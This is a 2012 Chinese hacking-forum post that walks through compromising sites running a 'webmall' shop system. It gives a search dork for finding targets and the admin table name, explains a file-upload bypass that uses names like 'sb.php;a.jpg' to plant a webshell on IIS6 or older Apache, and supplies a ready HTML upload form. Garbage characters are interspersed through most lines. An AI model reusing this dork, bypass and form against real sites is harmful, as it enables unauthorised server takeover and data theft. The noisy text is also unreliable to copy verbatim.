关键字:inurl:webmall/detail.php?id
, ^' T9 U, d3 B- A; x+ `) d# @
. H) Q0 ~/ r) m7 w( o数据表:pwn_base_admin3 B* p. d, w0 a% d
5 f6 N7 n0 H2 M& Z2 r% F关于拿shell
. W% n* A. j2 E 3 w1 Z2 Y. G* E% H$ Q% j
首先登录后台admin.php
. u( P n# e4 ?& ~( h3 _( Z0 L" O
; }5 g9 O% w3 j2 y D/ @" D+ k看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。% u; {6 T) d& h% [8 j
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg5 X4 t! o! e2 o2 [: `4 J) t
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的4 W0 w5 j. R9 \7 d' R1 {
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> + w0 f/ t+ J. r5 e$ h$ u W
<input type="text" name="fileName" value="sb.php;a.jpg" />
: D" y# v, ?" @" w* _: w" ^( _<input type="hidden" name="attachPath" value="news/pics/" />
+ M2 ]+ \! T' o8 q n% Q<input type="file" name="fileData" size="14" /></td> 8 a& C0 ^+ h2 t5 |6 ^) `
<input type="submit" name="button" value="确定" />
3 n# V. w: t" R) E, Q6 ]0 f/ s</form>
5 a( E i6 T9 C
! K7 g: [" c9 K! M9 U首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
$ `. E" D3 N3 B, i9 N* c
1 ]8 x( w, J9 G# j! l |
发表于 2012-11-9 20:52:15
收藏
支持
反对